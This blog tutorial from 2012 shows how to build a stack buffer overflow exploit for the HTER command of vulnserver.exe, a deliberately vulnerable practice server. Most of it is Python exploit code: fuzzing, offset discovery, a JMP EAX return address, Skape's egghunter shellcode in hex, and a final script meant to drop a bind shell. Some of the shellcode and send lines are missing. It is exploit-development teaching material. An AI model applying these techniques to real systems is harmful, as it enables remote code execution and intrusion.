Thursday, January 5, 2012

Stack-based BOF for HTER command in Vulnserver.exe tutorial

1. Introduction
This tutorial covers the process of writing a stack-based Buffer Overflow exploit for the HTER command in vulnserver.exe.

Vulnserver.exe is a deliberately insecure Windows server application meant for practicing fundamental fuzzing and exploit-writing skills.  It was written by Stephen Bradshaw a.k.a Lupin.  All credits for vulnserver.exe go to him.  The application can be downloaded from his blog at  Further details about vulnserver can be found there too.

Install the application and test it only on computer systems you own.

2. Pre-requisite Knowledge
The reader should have basic knowledge on using the following:
·         Immunity Debugger or Ollydbg v1.10
·         Spike fuzzer
·         Python 2.5 - 2.7
·         Bash and an editor such as Vim

This walkthrough will not cover the basics of BOF exploits.  For these basics as well as tutorials on Ollydbg and Spike, I highly recommend Lupin’s tutorials on writing exploits for Minishare 1.4.1 and BigAnt Server 2.52 SP5.  Once again, these can be found on Lupin’s blog.

To follow along in this tutorial, you will require two machines, or virtual machines.  My set-up is as follows:

  • Attacker ( Backtrack 3 and above will probably work. Frankly, any OS which you are comfortable with and which can run the programs above is fine.
  • Victim ( Windows XP SP3 with a copy of vulnserver, and Immunity Debugger or Ollydbg.

3. Fuzzing with Spike
First, run Immunity debugger on the Victim, and open vulnserver.exe within it.  You will see something like the screenshot below.  Then press F9 to run vulnserver.

On the Attacker, start wireshark and begin sniffing on the relevant interface.  Depending on your box and network, the correct interface for you may be eth0, eth1, wlan0, etc.

Next, create a .spk file for fuzzing the HTER command.  The following would work:

# cat 10hter.spk
printf("Fuzzing HTER command");
s_string("HTER ");

By default, vulnserver listens on port 9999.  Now let’s start our fuzzing with Spike:

# ./generic_send_tcp 9999 /path/to/spikefile/10hter.spk 0 0

It should not take long.  In Immunity Debugger, you should see that an “access violation when executing [0AAAAAAA]” has occurred.

Also observe that EIP was overwritten by 0AAAAAAA.

Before we get into the peculiarities of this EIP overwrite, let’s take a look at our wireshark capture.  Basically, we want to locate the fuzzed string that crashed vulnserver.  There should be a number of ways of doing so.  I shall leave this to the reader’s ingenuity.  Once you have done so, open the TCP stream.  You should see something similar to the following:

We have managed to crash vulnserver and overwrite EIP with slightly over 2000 bytes of “A”s.

Now for the interesting thing about this overwrite. Some character translation seems to have taken place.  Usually, when we successfully overflow a buffer with a string of “A”s, a 4-byte string “AAAA” will overwrite EIP with “41414141”.  In this case however, an 8-byte string “AAAAAAAA” is required to overwrite EIP with “AAAAAAAA”.

We will take a closer look at this behavior in the next section.

4. Replicating the Exploit in Python
Let’s first try to replicate the Exploit in Python.  After some testing, I found that sending over 3000 bytes of “A”s crashes vulnserver and overwrites EIP completely.  So let’s go with that.


import socket
import sys
import os

evil = "A” * 3000

buffer = "HTER "
buffer += evil

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((“”, 9999))

I then did a few tests on the character translation.  I have provided a summary of my findings below.  I will leave it to the user to replicate the findings.

Fuzzing String
“A” * 3000
EIP overwritten with “AAAAAAAA”
“abcd” * 750
EIP overwritten with “DABCDABC”
“EFGH” * 750
No crash
“CDEF” * 750
EIP overwritten with “FCDEFCDE”
“0189” * 750
EIP overwritten with “90189018”
“0” * 3000
No crash

From the results of the test, it appears that only hexadecimal characters can be used for our exploit.  Lower-case characters (“abcdefg”) are translated to upper-case ones (“ABCDEFG”) too.  In addition, while “0” can be used when placed next to another character, it cannot be used when placed next to another “0”.  For example, “90” is allowed but “00” is not.  (This makes sense since “00” represents the null byte in this case.)

5. Finding the Offset
Given the restrictions, we are unable to use the characters generated by MSF’s pattern_create.rb to help us find the offset.  While it is actually not too difficult to guess the offset in this particular case (hint: take a look at what EIP was overwritten by when we first fuzzed vulnserver, and the Spike output), I will quickly go through the more standard approach of finding the offset.

First, amend the earlier python script to equal-sized blocks of “1”s, “2”s, etc:


import socket
import sys
import os

evil = "1" * 200
evil += "2" * 200
evil += "3" * 200
evil += "4" * 200
evil += "5" * 200
evil += "6" * 200
evil += "7" * 200
evil += "8" * 200
evil += "9" * 200
evil += "a" * 200
evil += "b" * 200
evil += "c" * 200
evil += "d" * 200
evil += "e" * 200
evil += "f" * 200

buffer = "HTER "
buffer += evil

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((“”, 9999))

Send the draft exploit to crash vulnserver.  You will find that EIP will be overwritten by “BBBBBBBB”.  Next, replace the “evil” string with the following:

evil = "1" * 2000
evil += "2" * 20
evil += "3" * 20
evil += "4" * 20
evil += "5" * 20
evil += "6" * 20
evil += "7" * 20
evil += "8" * 20
evil += "9" * 20
evil += "a" * 20
evil += "b" * 20
evil += "1" * 800

Send the draft exploit to crash vulnserver again.  You will find that EIP will be overwritten by “44444444”.  Next, replace the “evil” string with the following:

evil = "1" * 2040
evil += "2" * 4
evil += "3" * 4
evil += "4" * 4
evil += "5" * 4
evil += "6" * 4
evil += "1" * 940

After crashing vulnserver, observe that EIP is now overwritten by a mix of “2”s, “3”s and “4”s.  Adjust the “evil” string accordingly and you should end up with the script below.


import socket
import sys
import os

evil = "1" * 2041    #first buffer
evil += "2" * 8
evil += "1" * 951    #second buffer

buffer = "HTER "
buffer += evil

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((“”, 9999))

This script will overwrite EIP with “22222222”.  It also provides about 2000 bytes of space before the overwrite and about 900 bytes of space after it.

6. A JMP into Our Buffer
Take a look at Immunity Debugger after crashing it with our latest python script.

You will find that after the crash, the address in EAX points to the beginning of our first buffer.  You can see this in the dump section above.  In addition, the address in ESP points to the beginning of our second buffer.  You can see this in the stack section above.

For the approach I will be using, either buffer can be used.  In this tutorial, I will just use the first buffer.  To do so, we should ideally use a “JMP EAX” or “CALL EAX” instruction.

We can find a “JMP EAX” instruction at the address 0x625011B1 in essfunc.dll, a module used by vulnserver.exe.  (You can download essfunc.dll at Lupin’s website too.)  Let’s plug this address into our “evil” string, keeping in mind the need to use the little-endian format.

evil = "1" * 2041    #first buffer
evil += "B1115062"
evil += "1" * 951    #second buffer

In Immunity Debugger, set a breakpoint at 0x625011B1 and send the exploit over.  You should be able to reach the breakpoint.  Next step into the next command with F7 - you should be able to reach the start of the first buffer.

7. Using the Egghunter
Now, we can inject code we want executed into the first buffer.  Due to the character translation limitations, I decided to use an egghunter, instead of using the much larger bind_shell or reverse_shell, which may lead to complications.

Skape’s excellent egghunter is as follows:
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x57\x30\x30\x54\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"    # \x57\x30\x30\x54 à W00T

Basically, the egghunter will search for the string “W00TW00T” in memory.  After finding it, it will execute what comes after, which presumably will be our bind or reverse shell shellcode.

Now let’s insert the egghunter shellcode into our draft exploit.   Note that after taking into account the character translation, the original 32-byte egghunter is now at 64 bytes.  Also note that fortunately, the string “00” does not appear anywhere in the egghunter.  Other possible bad characters like “0a” and “0d” are not present as well.

evil = "6681caff0f42526a0258cd2e3c055a74efb8573030548bfaaf75eaaf75e7ffe7" #now 64 bytes
evil += "1" * (2041 - 64)
evil += "B1115062"
evil += "1" * 951

Set a breakpoint at 0x625011B1, send over the updated exploit and take a look at Immunity Debugger.

Looking at the main window, note that the first character “6” has somehow gone missing.  This is easily rectified by making a slight tweak to the exploit however.

evil = “1” + "6681caff0f42526a0258cd2e3c055a74efb8573030548bfaaf75eaaf75e7ffe7" #now 1 + 64 bytes
evil += "1" * (2041 - 65)
evil += "B1115062"
evil += "1" * 951

Set a breakpoint at 0x625011B1, send the exploit over and check the main window of Immunity Debugger again.  You will see that the egghunter code was correctly sent over.

8. Inserting the Egg
Although I left this section for last, I had actually identified a way of getting our ‘egg’ into memory before deciding on the egghunter approach.  After having explored vulnserver a little earlier, I found out that if a string is just sent before the HTER command, this string will be stored in memory, and our egghunter should have little difficulty locating it.

To illustrate, take a look at the example code below.


import socket
import sys
import os

shellcode = "W00TW00T" + “\xcc” * 1000

evil = "A” * 3000

buffer = "HTER "
buffer += evil

buffermemory = shellcode

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((“”, 9999))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((“”, 9999))

After you execute the script above, search through the memory in Immunity Debugger.  You should be able to find a long string of “\xcc”s, located right after the string “W00TW00T”.  Also note that we are not faced with the character translation barrier here.

9. Completing the Exploit
Now that we have found a way of injecting our shellcode into memory, let’s complete our exploit.  We can use MSF to generate a bind shell shellcode, then insert it into our exploit.  The completed exploit is shown below.


import socket
import sys
import os

target = sys.argv[1]
port = int(sys.argv[2])

# msfpayload windows/shell_bind_tcp lport=4444 R | msfencode -b '\x00\x0a\x0d\x20' -t c
shellcode = (

#625011B1   FFE0             JMP EAX    in essfunc.dll
evil = "1" + "6681caff0f42526a0258cd2e3c055a74efb8573030548bfaaf75eaaf75e7ffe7" #now 1 + 64 bytes
evil += "1" * (2041 - 65)
evil += "B1115062"
evil += "1" * 951

buffer = "HTER "
buffer += evil

buffershell = "\x90\x90" + shellcode + "\xcc\xcc"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, port))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, port))

Let’s test it out.

And we have a shell.

(Acknowledgments: Thanks to Lupin for creating the excellent vulnserver.exe application for our practice and fun.)

By dearmo (5 January 2012)

1 comment:

  1. Nice Tutorial!
    Helped me a lot to understand egghunting, thank you!
